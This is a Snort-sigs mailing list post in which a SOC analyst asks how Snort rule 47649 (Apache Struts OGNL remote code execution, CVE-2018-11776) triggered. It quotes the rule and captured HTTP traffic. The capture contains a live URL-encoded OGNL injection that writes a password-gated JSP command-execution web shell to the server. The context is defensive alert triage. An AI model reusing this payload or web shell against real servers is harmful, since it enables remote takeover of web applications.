Understanding SNORT ID 47649

[Migell Roberts <migell.roberts () gdt com>]

I've been looking in the snort manual for an explanation on SID 47649 below and unfortunately, I can't find what I need:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
                msg:"SERVER-WEBAPP Apache Struts remote code execution attempt";
                flow:to_server;
                content:"|23|_memberAccess";
                fast_pattern:only;
                http_uri:;
                content:"ognl.";
                http_uri:;
                pcre:"/ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)/Ui";
                metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http;
                reference:cve,2018-11776;
                reference:url,cwiki.apache.org/confluence/display/WW/S2-057; classtype:attempted-user; sid:47649; 
rev:1; gid:1; )

We have Cisco Firepower and the above SID triggered. I'd like to know, how the above SID triggered (I have some 
assumptions, but didn't want to assume).


To paint more of a picture, below are the text captured from packet captures related to the event I found:

                °ªw0$¬ôcuÚE³@ÿÒ
[g
[>F®`PÚµlG¥(ð¶ZÏú
×w%á×w             ut.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.pba.com/
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
Client-IP: 10.10.10.1
Cookie: akaas_PBAdotComAudienceSegmentation=2147483647~rv=26~id=396fe2c7446d729001164ba005e14de4~rn=
True-Client-IP: 120.7.79.15
X-Akamai-CONFIG-LOG-DETAIL: true
TE:  chunked;q=1.0
Connection: TE
Accept-Encoding: gzip
Akamai-Origin-Hop: 2
Via: 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost)
X-Forwarded-For: 10.10.10.1, 120.7.79.15, 150.142.22.3
Host: www.pba.com
Cache-Control: max-age=86400
Connection: keep-alive

AND

°ªw0$¬ôcuÚE²@ÿV
[g
[>F®`PÚµfï¥(ð¶ZÏ÷ù
×w%á×w             GET 
/struts2-showcase/filedownload/index.action?method:%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20o


Regards,



Migell E. Roberts  |  SOC Analyst

[cid:image002.png@01D03569.BF39F870]

214.873.9250 office
migell.roberts () gdt com<mailto:migell.roberts () gdt com>


gdt.com<https://www.gdt.com/> | 999 Metromedia Place, Dallas, TX 75247

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists snort org
https://lists.snort.org/mailman/listinfo/snort-sigs

Please visit http://blog.snort.org for the latest news about Snort!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette

Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a 
href=" https://snort.org/downloads/#rule-downloads";>emerging threats</a>!